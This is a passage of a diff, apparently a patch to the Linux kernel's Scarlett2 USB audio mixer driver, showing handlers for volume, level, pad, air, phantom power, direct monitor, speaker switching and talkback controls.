+-static void scarlett2_sw_hw_ctl_rw(struct scarlett2_data *private, int index)
+-{
+-	private->sw_hw_ctls[index]->vd[0].access |=
+-		SNDRV_CTL_ELEM_ACCESS_WRITE;
+-}
+-
+-static int scarlett2_sw_hw_enum_ctl_info(struct snd_kcontrol *kctl,
+-					 struct snd_ctl_elem_info *uinfo)
+-{
+-	static const char *const values[2] = {
+-		"SW", "HW"
+-	};
+-
+-	return snd_ctl_enum_info(uinfo, 1, 2, values);
+-}
+-
+-static int scarlett2_sw_hw_enum_ctl_get(struct snd_kcontrol *kctl,
+-					struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct scarlett2_data *private = elem->head.mixer->private_data;
+-	int index = line_out_remap(private, elem->control);
+-
+-	ucontrol->value.enumerated.item[0] = private->vol_sw_hw_switch[index];
+-	return 0;
+-}
+-
+-static void scarlett2_vol_ctl_set_writable(struct usb_mixer_interface *mixer,
+-					   int index, int value)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	struct snd_card *card = mixer->chip->card;
+-
+-	/* Set/Clear write bits */
+-	if (value) {
+-		private->vol_ctls[index]->vd[0].access |=
+-			SNDRV_CTL_ELEM_ACCESS_WRITE;
+-		private->mute_ctls[index]->vd[0].access |=
+-			SNDRV_CTL_ELEM_ACCESS_WRITE;
+-	} else {
+-		private->vol_ctls[index]->vd[0].access &=
+-			~SNDRV_CTL_ELEM_ACCESS_WRITE;
+-		private->mute_ctls[index]->vd[0].access &=
+-			~SNDRV_CTL_ELEM_ACCESS_WRITE;
+-	}
+-
+-	/* Notify of write bit and possible value change */
+-	snd_ctl_notify(card,
+-		       SNDRV_CTL_EVENT_MASK_VALUE | SNDRV_CTL_EVENT_MASK_INFO,
+-		       &private->vol_ctls[index]->id);
+-	snd_ctl_notify(card,
+-		       SNDRV_CTL_EVENT_MASK_VALUE | SNDRV_CTL_EVENT_MASK_INFO,
+-		       &private->mute_ctls[index]->id);
+-}
+-
+-static int scarlett2_sw_hw_change(struct usb_mixer_interface *mixer,
+-				  int ctl_index, int val)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	int index = line_out_remap(private, ctl_index);
+-	int err;
+-
+-	private->vol_sw_hw_switch[index] = val;
+-
+-	/* Change access mode to RO (hardware controlled volume)
+-	 * or RW (software controlled volume)
+-	 */
+-	scarlett2_vol_ctl_set_writable(mixer, ctl_index, !val);
+-
+-	/* Reset volume/mute to master volume/mute */
+-	private->vol[index] = private->master_vol;
+-	private->mute_switch[index] = private->dim_mute[SCARLETT2_BUTTON_MUTE];
+-
+-	/* Set SW volume to current HW volume */
+-	err = scarlett2_usb_set_config(
+-		mixer, SCARLETT2_CONFIG_LINE_OUT_VOLUME,
+-		index, private->master_vol - SCARLETT2_VOLUME_BIAS);
+-	if (err < 0)
+-		return err;
+-
+-	/* Set SW mute to current HW mute */
+-	err = scarlett2_usb_set_config(
+-		mixer, SCARLETT2_CONFIG_MUTE_SWITCH,
+-		index, private->dim_mute[SCARLETT2_BUTTON_MUTE]);
+-	if (err < 0)
+-		return err;
+-
+-	/* Send SW/HW switch change to the device */
+-	return scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_SW_HW_SWITCH,
+-					index, val);
+-}
+-
+-static int scarlett2_sw_hw_enum_ctl_put(struct snd_kcontrol *kctl,
+-					struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int ctl_index = elem->control;
+-	int index = line_out_remap(private, ctl_index);
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->vol_sw_hw_switch[index];
+-	val = !!ucontrol->value.enumerated.item[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	err = scarlett2_sw_hw_change(mixer, ctl_index, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_sw_hw_enum_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = scarlett2_sw_hw_enum_ctl_info,
+-	.get  = scarlett2_sw_hw_enum_ctl_get,
+-	.put  = scarlett2_sw_hw_enum_ctl_put,
+-};
+-
+-/*** Line Level/Instrument Level Switch Controls ***/
+-
+-static int scarlett2_update_input_other(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-
+-	private->input_other_updated = 0;
+-
+-	if (info->level_input_count) {
+-		int err = scarlett2_usb_get_config(
+-			mixer, SCARLETT2_CONFIG_LEVEL_SWITCH,
+-			info->level_input_count + info->level_input_first,
+-			private->level_switch);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	if (info->pad_input_count) {
+-		int err = scarlett2_usb_get_config(
+-			mixer, SCARLETT2_CONFIG_PAD_SWITCH,
+-			info->pad_input_count, private->pad_switch);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	if (info->air_input_count) {
+-		int err = scarlett2_usb_get_config(
+-			mixer, SCARLETT2_CONFIG_AIR_SWITCH,
+-			info->air_input_count, private->air_switch);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	if (info->phantom_count) {
+-		int err = scarlett2_usb_get_config(
+-			mixer, SCARLETT2_CONFIG_PHANTOM_SWITCH,
+-			info->phantom_count, private->phantom_switch);
+-		if (err < 0)
+-			return err;
+-
+-		err = scarlett2_usb_get_config(
+-			mixer, SCARLETT2_CONFIG_PHANTOM_PERSISTENCE,
+-			1, &private->phantom_persistence);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	return 0;
+-}
+-
+-static int scarlett2_level_enum_ctl_info(struct snd_kcontrol *kctl,
+-					 struct snd_ctl_elem_info *uinfo)
+-{
+-	static const char *const values[2] = {
+-		"Line", "Inst"
+-	};
+-
+-	return snd_ctl_enum_info(uinfo, 1, 2, values);
+-}
+-
+-static int scarlett2_level_enum_ctl_get(struct snd_kcontrol *kctl,
+-					struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-
+-	int index = elem->control + info->level_input_first;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->input_other_updated) {
+-		err = scarlett2_update_input_other(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.enumerated.item[0] = private->level_switch[index];
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_level_enum_ctl_put(struct snd_kcontrol *kctl,
+-					struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-
+-	int index = elem->control + info->level_input_first;
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->level_switch[index];
+-	val = !!ucontrol->value.enumerated.item[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->level_switch[index] = val;
+-
+-	/* Send switch change to the device */
+-	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_LEVEL_SWITCH,
+-				       index, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_level_enum_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = scarlett2_level_enum_ctl_info,
+-	.get  = scarlett2_level_enum_ctl_get,
+-	.put  = scarlett2_level_enum_ctl_put,
+-};
+-
+-/*** Pad Switch Controls ***/
+-
+-static int scarlett2_pad_ctl_get(struct snd_kcontrol *kctl,
+-				 struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->input_other_updated) {
+-		err = scarlett2_update_input_other(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.integer.value[0] =
+-		private->pad_switch[elem->control];
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_pad_ctl_put(struct snd_kcontrol *kctl,
+-				 struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	int index = elem->control;
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->pad_switch[index];
+-	val = !!ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->pad_switch[index] = val;
+-
+-	/* Send switch change to the device */
+-	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_PAD_SWITCH,
+-				       index, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_pad_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = snd_ctl_boolean_mono_info,
+-	.get  = scarlett2_pad_ctl_get,
+-	.put  = scarlett2_pad_ctl_put,
+-};
+-
+-/*** Air Switch Controls ***/
+-
+-static int scarlett2_air_ctl_get(struct snd_kcontrol *kctl,
+-				 struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->input_other_updated) {
+-		err = scarlett2_update_input_other(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.integer.value[0] = private->air_switch[elem->control];
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_air_ctl_put(struct snd_kcontrol *kctl,
+-				 struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	int index = elem->control;
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->air_switch[index];
+-	val = !!ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->air_switch[index] = val;
+-
+-	/* Send switch change to the device */
+-	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_AIR_SWITCH,
+-				       index, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_air_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = snd_ctl_boolean_mono_info,
+-	.get  = scarlett2_air_ctl_get,
+-	.put  = scarlett2_air_ctl_put,
+-};
+-
+-/*** Phantom Switch Controls ***/
+-
+-static int scarlett2_phantom_ctl_get(struct snd_kcontrol *kctl,
+-				     struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->input_other_updated) {
+-		err = scarlett2_update_input_other(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.integer.value[0] =
+-		private->phantom_switch[elem->control];
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_phantom_ctl_put(struct snd_kcontrol *kctl,
+-				     struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	int index = elem->control;
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->phantom_switch[index];
+-	val = !!ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->phantom_switch[index] = val;
+-
+-	/* Send switch change to the device */
+-	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_PHANTOM_SWITCH,
+-				       index, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_phantom_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = snd_ctl_boolean_mono_info,
+-	.get  = scarlett2_phantom_ctl_get,
+-	.put  = scarlett2_phantom_ctl_put,
+-};
+-
+-/*** Phantom Persistence Control ***/
+-
+-static int scarlett2_phantom_persistence_ctl_get(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct scarlett2_data *private = elem->head.mixer->private_data;
+-
+-	ucontrol->value.integer.value[0] = private->phantom_persistence;
+-	return 0;
+-}
+-
+-static int scarlett2_phantom_persistence_ctl_put(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	int index = elem->control;
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->phantom_persistence;
+-	val = !!ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->phantom_persistence = val;
+-
+-	/* Send switch change to the device */
+-	err = scarlett2_usb_set_config(
+-		mixer, SCARLETT2_CONFIG_PHANTOM_PERSISTENCE, index, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_phantom_persistence_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = snd_ctl_boolean_mono_info,
+-	.get  = scarlett2_phantom_persistence_ctl_get,
+-	.put  = scarlett2_phantom_persistence_ctl_put,
+-};
+-
+-/*** Direct Monitor Control ***/
+-
+-static int scarlett2_update_monitor_other(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	int err;
+-
+-	/* monitor_other_enable[0] enables speaker switching
+-	 * monitor_other_enable[1] enables talkback
+-	 */
+-	u8 monitor_other_enable[2];
+-
+-	/* monitor_other_switch[0] activates the alternate speakers
+-	 * monitor_other_switch[1] activates talkback
+-	 */
+-	u8 monitor_other_switch[2];
+-
+-	private->monitor_other_updated = 0;
+-
+-	if (info->direct_monitor)
+-		return scarlett2_usb_get_config(
+-			mixer, SCARLETT2_CONFIG_DIRECT_MONITOR,
+-			1, &private->direct_monitor_switch);
+-
+-	/* if it doesn't do speaker switching then it also doesn't do
+-	 * talkback
+-	 */
+-	if (!info->has_speaker_switching)
+-		return 0;
+-
+-	err = scarlett2_usb_get_config(
+-		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE,
+-		2, monitor_other_enable);
+-	if (err < 0)
+-		return err;
+-
+-	err = scarlett2_usb_get_config(
+-		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH,
+-		2, monitor_other_switch);
+-	if (err < 0)
+-		return err;
+-
+-	if (!monitor_other_enable[0])
+-		private->speaker_switching_switch = 0;
+-	else
+-		private->speaker_switching_switch = monitor_other_switch[0] + 1;
+-
+-	if (info->has_talkback) {
+-		const int (*port_count)[SCARLETT2_PORT_DIRNS] =
+-			info->port_count;
+-		int num_mixes =
+-			port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
+-		u16 bitmap;
+-		int i;
+-
+-		if (!monitor_other_enable[1])
+-			private->talkback_switch = 0;
+-		else
+-			private->talkback_switch = monitor_other_switch[1] + 1;
+-
+-		err = scarlett2_usb_get_config(mixer,
+-					       SCARLETT2_CONFIG_TALKBACK_MAP,
+-					       1, &bitmap);
+-		if (err < 0)
+-			return err;
+-		for (i = 0; i < num_mixes; i++, bitmap >>= 1)
+-			private->talkback_map[i] = bitmap & 1;
+-	}
+-
+-	return 0;
+-}
+-
+-static int scarlett2_direct_monitor_ctl_get(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = elem->head.mixer->private_data;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->monitor_other_updated) {
+-		err = scarlett2_update_monitor_other(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.enumerated.item[0] = private->direct_monitor_switch;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_direct_monitor_ctl_put(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	int index = elem->control;
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->direct_monitor_switch;
+-	val = min(ucontrol->value.enumerated.item[0], 2U);
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->direct_monitor_switch = val;
+-
+-	/* Send switch change to the device */
+-	err = scarlett2_usb_set_config(
+-		mixer, SCARLETT2_CONFIG_DIRECT_MONITOR, index, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_direct_monitor_stereo_enum_ctl_info(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_info *uinfo)
+-{
+-	static const char *const values[3] = {
+-		"Off", "Mono", "Stereo"
+-	};
+-
+-	return snd_ctl_enum_info(uinfo, 1, 3, values);
+-}
+-
+-/* Direct Monitor for Solo is mono-only and only needs a boolean control
+- * Direct Monitor for 2i2 is selectable between Off/Mono/Stereo
+- */
+-static const struct snd_kcontrol_new scarlett2_direct_monitor_ctl[2] = {
+-	{
+-		.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-		.name = "",
+-		.info = snd_ctl_boolean_mono_info,
+-		.get  = scarlett2_direct_monitor_ctl_get,
+-		.put  = scarlett2_direct_monitor_ctl_put,
+-	},
+-	{
+-		.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-		.name = "",
+-		.info = scarlett2_direct_monitor_stereo_enum_ctl_info,
+-		.get  = scarlett2_direct_monitor_ctl_get,
+-		.put  = scarlett2_direct_monitor_ctl_put,
+-	}
+-};
+-
+-static int scarlett2_add_direct_monitor_ctl(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const char *s;
+-
+-	if (!info->direct_monitor)
+-		return 0;
+-
+-	s = info->direct_monitor == 1
+-	      ? "Direct Monitor Playback Switch"
+-	      : "Direct Monitor Playback Enum";
+-
+-	return scarlett2_add_new_ctl(
+-		mixer, &scarlett2_direct_monitor_ctl[info->direct_monitor - 1],
+-		0, 1, s, &private->direct_monitor_ctl);
+-}
+-
+-/*** Speaker Switching Control ***/
+-
+-static int scarlett2_speaker_switch_enum_ctl_info(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_info *uinfo)
+-{
+-	static const char *const values[3] = {
+-		"Off", "Main", "Alt"
+-	};
+-
+-	return snd_ctl_enum_info(uinfo, 1, 3, values);
+-}
+-
+-static int scarlett2_speaker_switch_enum_ctl_get(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->monitor_other_updated) {
+-		err = scarlett2_update_monitor_other(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.enumerated.item[0] = private->speaker_switching_switch;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-/* when speaker switching gets enabled, switch the main/alt speakers
+- * to HW volume and disable those controls
+- */
+-static int scarlett2_speaker_switch_enable(struct usb_mixer_interface *mixer)
+-{
+-	struct snd_card *card = mixer->chip->card;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int i, err;
+-
+-	for (i = 0; i < 4; i++) {
+-		int index = line_out_remap(private, i);
+-
+-		/* switch the main/alt speakers to HW volume */
+-		if (!private->vol_sw_hw_switch[index]) {
+-			err = scarlett2_sw_hw_change(private->mixer, i, 1);
+-			if (err < 0)
+-				return err;
+-		}
+-
+-		/* disable the line out SW/HW switch */
+-		scarlett2_sw_hw_ctl_ro(private, i);
+-		snd_ctl_notify(card,
+-			       SNDRV_CTL_EVENT_MASK_VALUE |
+-				 SNDRV_CTL_EVENT_MASK_INFO,
+-			       &private->sw_hw_ctls[i]->id);
+-	}
+-
+-	/* when the next monitor-other notify comes in, update the mux
+-	 * configuration
+-	 */
+-	private->speaker_switching_switched = 1;
+-
+-	return 0;
+-}
+-
+-/* when speaker switching gets disabled, reenable the hw/sw controls
+- * and invalidate the routing
+- */
+-static void scarlett2_speaker_switch_disable(struct usb_mixer_interface *mixer)
+-{
+-	struct snd_card *card = mixer->chip->card;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int i;
+-
+-	/* enable the line out SW/HW switch */
+-	for (i = 0; i < 4; i++) {
+-		scarlett2_sw_hw_ctl_rw(private, i);
+-		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_INFO,
+-			       &private->sw_hw_ctls[i]->id);
+-	}
+-
+-	/* when the next monitor-other notify comes in, update the mux
+-	 * configuration
+-	 */
+-	private->speaker_switching_switched = 1;
+-}
+-
+-static int scarlett2_speaker_switch_enum_ctl_put(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->speaker_switching_switch;
+-	val = min(ucontrol->value.enumerated.item[0], 2U);
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->speaker_switching_switch = val;
+-
+-	/* enable/disable speaker switching */
+-	err = scarlett2_usb_set_config(
+-		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE,
+-		0, !!val);
+-	if (err < 0)
+-		goto unlock;
+-
+-	/* if speaker switching is enabled, select main or alt */
+-	err = scarlett2_usb_set_config(
+-		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH,
+-		0, val == 2);
+-	if (err < 0)
+-		goto unlock;
+-
+-	/* update controls if speaker switching gets enabled or disabled */
+-	if (!oval && val)
+-		err = scarlett2_speaker_switch_enable(mixer);
+-	else if (oval && !val)
+-		scarlett2_speaker_switch_disable(mixer);
+-
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_speaker_switch_enum_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = scarlett2_speaker_switch_enum_ctl_info,
+-	.get  = scarlett2_speaker_switch_enum_ctl_get,
+-	.put  = scarlett2_speaker_switch_enum_ctl_put,
+-};
+-
+-static int scarlett2_add_speaker_switch_ctl(
+-	struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-
+-	if (!info->has_speaker_switching)
+-		return 0;
+-
+-	return scarlett2_add_new_ctl(
+-		mixer, &scarlett2_speaker_switch_enum_ctl,
+-		0, 1, "Speaker Switching Playback Enum",
+-		&private->speaker_switching_ctl);
+-}
+-
+-/*** Talkback and Talkback Map Controls ***/
+-
+-static int scarlett2_talkback_enum_ctl_info(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_info *uinfo)
+-{
+-	static const char *const values[3] = {
+-		"Disabled", "Off", "On"
+-	};
+-
+-	return snd_ctl_enum_info(uinfo, 1, 3, values);
+-}
+-
+-static int scarlett2_talkback_enum_ctl_get(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->monitor_other_updated) {
+-		err = scarlett2_update_monitor_other(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.enumerated.item[0] = private->talkback_switch;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_talkback_enum_ctl_put(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->talkback_switch;
+-	val = min(ucontrol->value.enumerated.item[0], 2U);
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->talkback_switch = val;
+-
+-	/* enable/disable talkback */
+-	err = scarlett2_usb_set_config(
+-		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE,
+-		1, !!val);
+-	if (err < 0)
+-		goto unlock;
+-
+-	/* if talkback is enabled, select main or alt */
+-	err = scarlett2_usb_set_config(
+-		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH,
+-		1, val == 2);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_talkback_enum_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = scarlett2_talkback_enum_ctl_info,
+-	.get  = scarlett2_talkback_enum_ctl_get,
+-	.put  = scarlett2_talkback_enum_ctl_put,
+-};
+-
+-static int scarlett2_talkback_map_ctl_get(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int index = elem->control;
+-
+-	ucontrol->value.integer.value[0] = private->talkback_map[index];
+-
+-	return 0;
+-}
+-
+-static int scarlett2_talkback_map_ctl_put(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] =
+-		private->info->port_count;
+-	int num_mixes = port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
+-
+-	int index = elem->control;
+-	int oval, val, err = 0, i;
+-	u16 bitmap = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->talkback_map[index];
+-	val = !!ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->talkback_map[index] = val;
+-
+-	for (i = 0; i < num_mixes; i++)
+-		bitmap |= private->talkback_map[i] << i;
+-
+-	/* Send updated bitmap to the device */
+-	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_TALKBACK_MAP,
+-				       0, bitmap);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_talkback_map_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = snd_ctl_boolean_mono_info,
+-	.get  = scarlett2_talkback_map_ctl_get,
+-	.put  = scarlett2_talkback_map_ctl_put,
+-};
+-
+-static int scarlett2_add_talkback_ctls(
+-	struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
